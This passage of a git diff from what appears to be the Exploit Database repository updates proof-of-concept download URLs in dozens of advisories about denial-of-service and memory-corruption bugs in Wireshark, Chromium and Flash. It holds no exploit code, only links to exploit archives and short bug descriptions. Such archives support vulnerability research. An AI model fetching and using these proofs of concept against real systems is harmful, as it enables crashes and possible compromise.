-78,4 +78,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38999.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38999.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39000.txt b/exploits/multiple/dos/39000.txt index d323aaf0e..4b09d7aba 100644 --- a/exploits/multiple/dos/39000.txt +++ b/exploits/multiple/dos/39000.txt @@ -90,4 +90,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39000.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39000.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39001.txt b/exploits/multiple/dos/39001.txt index ddeeda9d2..b21ae33a1 100644 --- a/exploits/multiple/dos/39001.txt +++ b/exploits/multiple/dos/39001.txt @@ -58,4 +58,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39001.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39001.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39002.txt b/exploits/multiple/dos/39002.txt index 6d16662e1..babf18f72 100644 --- a/exploits/multiple/dos/39002.txt +++ b/exploits/multiple/dos/39002.txt @@ -102,4 +102,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39002.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39002.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39003.txt b/exploits/multiple/dos/39003.txt index 2446a9df3..492db6904 100644 --- a/exploits/multiple/dos/39003.txt +++ b/exploits/multiple/dos/39003.txt @@ -103,4 +103,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39003.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39003.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39004.txt b/exploits/multiple/dos/39004.txt index fad99ce82..7efe37682 100644 --- a/exploits/multiple/dos/39004.txt +++ b/exploits/multiple/dos/39004.txt @@ -61,4 +61,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39004.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39004.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39005.txt b/exploits/multiple/dos/39005.txt index 4c7cc3e1b..a963b8bce 100644 --- a/exploits/multiple/dos/39005.txt +++ b/exploits/multiple/dos/39005.txt @@ -87,4 +87,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39005.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39005.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39006.txt b/exploits/multiple/dos/39006.txt index 8c6c37492..0e1edc535 100644 --- a/exploits/multiple/dos/39006.txt +++ b/exploits/multiple/dos/39006.txt @@ -66,4 +66,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39006.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39006.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39039.txt b/exploits/multiple/dos/39039.txt index ee1b95141..454ef80e7 100644 --- a/exploits/multiple/dos/39039.txt +++ b/exploits/multiple/dos/39039.txt @@ -64,4 +64,4 @@ and visit the attached html page, with the attached image in the same directory. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39039.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39039.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39076.txt b/exploits/multiple/dos/39076.txt index f0ce47953..772e0fd20 100644 --- a/exploits/multiple/dos/39076.txt +++ b/exploits/multiple/dos/39076.txt @@ -62,4 +62,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39076.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39076.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39077.txt b/exploits/multiple/dos/39077.txt index 57039dc0f..31cd9b0bd 100644 --- a/exploits/multiple/dos/39077.txt +++ b/exploits/multiple/dos/39077.txt @@ -82,4 +82,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39077.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39077.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39162.txt b/exploits/multiple/dos/39162.txt index 7794c776c..b6eb523e2 100644 --- a/exploits/multiple/dos/39162.txt +++ b/exploits/multiple/dos/39162.txt @@ -92,4 +92,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39162.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39162.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39163.txt b/exploits/multiple/dos/39163.txt index c7f3b2a80..f459e87c0 100644 --- a/exploits/multiple/dos/39163.txt +++ b/exploits/multiple/dos/39163.txt @@ -80,4 +80,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39163.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39163.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39164.txt b/exploits/multiple/dos/39164.txt index 1fcaf8273..71fb8d3d8 100644 --- a/exploits/multiple/dos/39164.txt +++ b/exploits/multiple/dos/39164.txt @@ -55,4 +55,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39164.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39164.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39165.txt b/exploits/multiple/dos/39165.txt index 9d9b3ae1b..36e05a21a 100644 --- a/exploits/multiple/dos/39165.txt +++ b/exploits/multiple/dos/39165.txt @@ -80,4 +80,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39165.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39165.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39219.txt b/exploits/multiple/dos/39219.txt index a36ef1446..58906baa9 100644 --- a/exploits/multiple/dos/39219.txt +++ b/exploits/multiple/dos/39219.txt @@ -4,4 +4,4 @@ The attached swf file causes an out-of-bounds memset in BlurFilter processing. N Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39219.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39219.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39321.txt b/exploits/multiple/dos/39321.txt index 74eaffb95..e66c18226 100644 --- a/exploits/multiple/dos/39321.txt +++ b/exploits/multiple/dos/39321.txt @@ -99,4 +99,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39321.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39321.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39322.txt b/exploits/multiple/dos/39322.txt index a139bacf5..34f593dc2 100644 --- a/exploits/multiple/dos/39322.txt +++ b/exploits/multiple/dos/39322.txt @@ -105,4 +105,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39322.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39322.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39323.txt b/exploits/multiple/dos/39323.txt index e5b19de6e..49b50b352 100644 --- a/exploits/multiple/dos/39323.txt +++ b/exploits/multiple/dos/39323.txt @@ -61,4 +61,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39323.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39323.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39324.txt b/exploits/multiple/dos/39324.txt index 71113de41..4833fad4d 100644 --- a/exploits/multiple/dos/39324.txt +++ b/exploits/multiple/dos/39324.txt @@ -109,4 +109,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39324.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39324.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39325.txt b/exploits/multiple/dos/39325.txt index a83b13c33..fc4be8448 100644 --- a/exploits/multiple/dos/39325.txt +++ b/exploits/multiple/dos/39325.txt @@ -85,4 +85,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39325.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39325.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39326.txt b/exploits/multiple/dos/39326.txt index f331af586..7f37100f8 100644 --- a/exploits/multiple/dos/39326.txt +++ b/exploits/multiple/dos/39326.txt @@ -60,4 +60,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39326.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39326.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39327.txt b/exploits/multiple/dos/39327.txt index 805628568..7e971c8eb 100644 --- a/exploits/multiple/dos/39327.txt +++ b/exploits/multiple/dos/39327.txt @@ -129,4 +129,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39327.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39327.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39358.txt b/exploits/multiple/dos/39358.txt index ed47f5967..7925e8632 100644 --- a/exploits/multiple/dos/39358.txt +++ b/exploits/multiple/dos/39358.txt @@ -96,4 +96,4 @@ state of the stack. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39358.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39358.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39379.txt b/exploits/multiple/dos/39379.txt index cb1f520ef..6216e0a8a 100644 --- a/exploits/multiple/dos/39379.txt +++ b/exploits/multiple/dos/39379.txt @@ -180,4 +180,4 @@ Guessing that this affects iOS too but haven't tested. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39379.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39379.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39401.txt b/exploits/multiple/dos/39401.txt index 6af0095b9..5420b1b16 100644 --- a/exploits/multiple/dos/39401.txt +++ b/exploits/multiple/dos/39401.txt @@ -142,4 +142,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39401.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39401.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39426.txt b/exploits/multiple/dos/39426.txt index 322cd5fc0..75b698229 100644 --- a/exploits/multiple/dos/39426.txt +++ b/exploits/multiple/dos/39426.txt @@ -4,4 +4,4 @@ The attached mp4 file causes stack corruption in Flash. To run the test, load Lo Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39426-1.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39426-1.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39460.txt b/exploits/multiple/dos/39460.txt index f1566673b..2d681aabc 100644 --- a/exploits/multiple/dos/39460.txt +++ b/exploits/multiple/dos/39460.txt @@ -4,4 +4,4 @@ The attached file can cause an out-of-bounds read of an image. While the bits of Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39460.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39460.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39461.txt b/exploits/multiple/dos/39461.txt index 60e4ef0c3..dc981d476 100644 --- a/exploits/multiple/dos/39461.txt +++ b/exploits/multiple/dos/39461.txt @@ -21,4 +21,4 @@ Then in the swf, a backing object of a different type with ID 0xfff9 is created, Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39461.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39461.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39462.txt b/exploits/multiple/dos/39462.txt index 45836f889..2624e96c4 100644 --- a/exploits/multiple/dos/39462.txt +++ b/exploits/multiple/dos/39462.txt @@ -29,4 +29,4 @@ A full PoC and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39462.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39462.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39463.txt b/exploits/multiple/dos/39463.txt index 4ba056c74..a3bcc376e 100644 --- a/exploits/multiple/dos/39463.txt +++ b/exploits/multiple/dos/39463.txt @@ -24,4 +24,4 @@ A sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39463.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39463.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39464.txt b/exploits/multiple/dos/39464.txt index 98826c2b3..9af90c1d1 100644 --- a/exploits/multiple/dos/39464.txt +++ b/exploits/multiple/dos/39464.txt @@ -4,4 +4,4 @@ There is an out-of-bounds read in H264 parsing, a fuzzed file is attached. To lo Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39464.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39464.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39465.txt b/exploits/multiple/dos/39465.txt index f79dbe22b..d5d816143 100644 --- a/exploits/multiple/dos/39465.txt +++ b/exploits/multiple/dos/39465.txt @@ -4,4 +4,4 @@ The attached file causes a crash due to a heap overflow, probably due to an issu Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39465.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39465.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39466.txt b/exploits/multiple/dos/39466.txt index 072bb8e71..330f7f9bb 100644 --- a/exploits/multiple/dos/39466.txt +++ b/exploits/multiple/dos/39466.txt @@ -4,4 +4,4 @@ The attached flv file causes stack corruption when loaded into Flash. To use the Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39466.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39466.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39467.txt b/exploits/multiple/dos/39467.txt index 69cf53636..d9f5990fc 100644 --- a/exploits/multiple/dos/39467.txt +++ b/exploits/multiple/dos/39467.txt @@ -4,4 +4,4 @@ The attached fuzz test case causes a crash due to a heap overflow in BitmapData. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39467.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39467.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39476.txt b/exploits/multiple/dos/39476.txt index 1fc9e3067..cab71287b 100644 --- a/exploits/multiple/dos/39476.txt +++ b/exploits/multiple/dos/39476.txt @@ -12,4 +12,4 @@ When the button is created, the font will be type confused with a button. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39476.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39476.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39482.txt b/exploits/multiple/dos/39482.txt index 6dc324e63..210e2a1f3 100644 --- a/exploits/multiple/dos/39482.txt +++ b/exploits/multiple/dos/39482.txt @@ -94,4 +94,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39482.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39482.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39483.txt b/exploits/multiple/dos/39483.txt index 8c478e57d..95663dd41 100644 --- a/exploits/multiple/dos/39483.txt +++ b/exploits/multiple/dos/39483.txt @@ -70,4 +70,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39483.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39483.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39484.txt b/exploits/multiple/dos/39484.txt index adf9aba13..73cd108bc 100644 --- a/exploits/multiple/dos/39484.txt +++ b/exploits/multiple/dos/39484.txt @@ -137,4 +137,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39484.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39484.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39490.txt b/exploits/multiple/dos/39490.txt index 14c27ff8f..38c484fe3 100644 --- a/exploits/multiple/dos/39490.txt +++ b/exploits/multiple/dos/39490.txt @@ -62,4 +62,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39490.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39490.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39503.txt b/exploits/multiple/dos/39503.txt index a3d7a20b1..97bf8cae4 100644 --- a/exploits/multiple/dos/39503.txt +++ b/exploits/multiple/dos/39503.txt @@ -101,4 +101,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39503.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39503.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39529.txt b/exploits/multiple/dos/39529.txt index 987827b98..ce4f42aac 100644 --- a/exploits/multiple/dos/39529.txt +++ b/exploits/multiple/dos/39529.txt @@ -67,4 +67,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39529.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39529.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39551.txt b/exploits/multiple/dos/39551.txt index 63784674f..d149424a2 100644 --- a/exploits/multiple/dos/39551.txt +++ b/exploits/multiple/dos/39551.txt @@ -31,4 +31,4 @@ The vulnerable code is located in pscp.c [4] line 1498 (HEAD) and is based on an Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39551.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39551.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39604.txt b/exploits/multiple/dos/39604.txt index 853fe1a53..ac56b4bca 100644 --- a/exploits/multiple/dos/39604.txt +++ b/exploits/multiple/dos/39604.txt @@ -94,4 +94,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39604.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39604.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39633.txt b/exploits/multiple/dos/39633.txt index a76d1c76c..119954a6d 100644 --- a/exploits/multiple/dos/39633.txt +++ b/exploits/multiple/dos/39633.txt @@ -63,6 +63,6 @@ By providing a malformed FPX file, an attacker is able to create controlled memo Proof of Concept: http://protekresearchlab.com/exploits/COSIG-2016-14.fpx -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39633.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39633.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/39634.txt b/exploits/multiple/dos/39634.txt index 2709694bd..5f037b9e8 100644 --- a/exploits/multiple/dos/39634.txt +++ b/exploits/multiple/dos/39634.txt @@ -62,6 +62,6 @@ By providing a malformed FPX file, an attacker is able to create controlled memo =========== http://protekresearchlab.com/exploits/COSIG-2016-15.fpx -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39634.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39634.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/39635.txt b/exploits/multiple/dos/39635.txt index b9c9b7569..b0874163f 100644 --- a/exploits/multiple/dos/39635.txt +++ b/exploits/multiple/dos/39635.txt @@ -62,6 +62,6 @@ By providing a malformed PSD file, an attacker is able to create an out of bound =========== http://protekresearchlab.com/exploits/COSIG-2016-16.psd -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39635.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39635.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/39644.txt b/exploits/multiple/dos/39644.txt index 26557f4ea..717ecb70f 100644 --- a/exploits/multiple/dos/39644.txt +++ b/exploits/multiple/dos/39644.txt @@ -94,4 +94,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39644.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39644.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39649.txt b/exploits/multiple/dos/39649.txt index 09e33e16f..3a7c214e7 100644 --- a/exploits/multiple/dos/39649.txt +++ b/exploits/multiple/dos/39649.txt @@ -31,4 +31,4 @@ A sample script and SWF are attached. Note that file.txt needs to be in the same Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39649.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39649.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39650.txt b/exploits/multiple/dos/39650.txt index 6b9764e7e..0230c5160 100644 --- a/exploits/multiple/dos/39650.txt +++ b/exploits/multiple/dos/39650.txt @@ -25,4 +25,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39650.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39650.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39652.txt b/exploits/multiple/dos/39652.txt index 3e43245fb..0186520e8 100644 --- a/exploits/multiple/dos/39652.txt +++ b/exploits/multiple/dos/39652.txt @@ -21,4 +21,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39652.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39652.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39748.txt b/exploits/multiple/dos/39748.txt index 78cc26e0a..6b641227d 100644 --- a/exploits/multiple/dos/39748.txt +++ b/exploits/multiple/dos/39748.txt @@ -111,4 +111,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39748.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39748.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39749.txt b/exploits/multiple/dos/39749.txt index 9a53a822b..ff3a6870b 100644 --- a/exploits/multiple/dos/39749.txt +++ b/exploits/multiple/dos/39749.txt @@ -106,4 +106,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39749.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39749.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39750.txt b/exploits/multiple/dos/39750.txt index eac3ba430..34b61cc23 100644 --- a/exploits/multiple/dos/39750.txt +++ b/exploits/multiple/dos/39750.txt @@ -172,4 +172,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39750.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39750.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39768.txt b/exploits/multiple/dos/39768.txt index fc6e96f57..3ac3a744f 100644 --- a/exploits/multiple/dos/39768.txt +++ b/exploits/multiple/dos/39768.txt @@ -2,7 +2,7 @@ Source: http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-ope TLS-Attacker: https://github.com/RUB-NDS/TLS-Attacker -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39768.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39768.zip You can use TLS-Attacker to build a proof of concept and test your implementation. You just start TLS-Attacker as follows: diff --git a/exploits/multiple/dos/39799.txt b/exploits/multiple/dos/39799.txt index e74501842..2a326e47c 100644 --- a/exploits/multiple/dos/39799.txt +++ b/exploits/multiple/dos/39799.txt @@ -44,6 +44,6 @@ Technical details: POC: ========== https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-14_PoC.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39799.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39799.zip ######################################################################################## \ No newline at end of file diff --git a/exploits/multiple/dos/39812.txt b/exploits/multiple/dos/39812.txt index eddb42611..5e0f070d8 100644 --- a/exploits/multiple/dos/39812.txt +++ b/exploits/multiple/dos/39812.txt @@ -76,4 +76,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39812.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39812.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39824.txt b/exploits/multiple/dos/39824.txt index 7d0400c66..0f0c74525 100644 --- a/exploits/multiple/dos/39824.txt +++ b/exploits/multiple/dos/39824.txt @@ -8,4 +8,4 @@ LoadImage.swf?img=8 Proof of Concept: 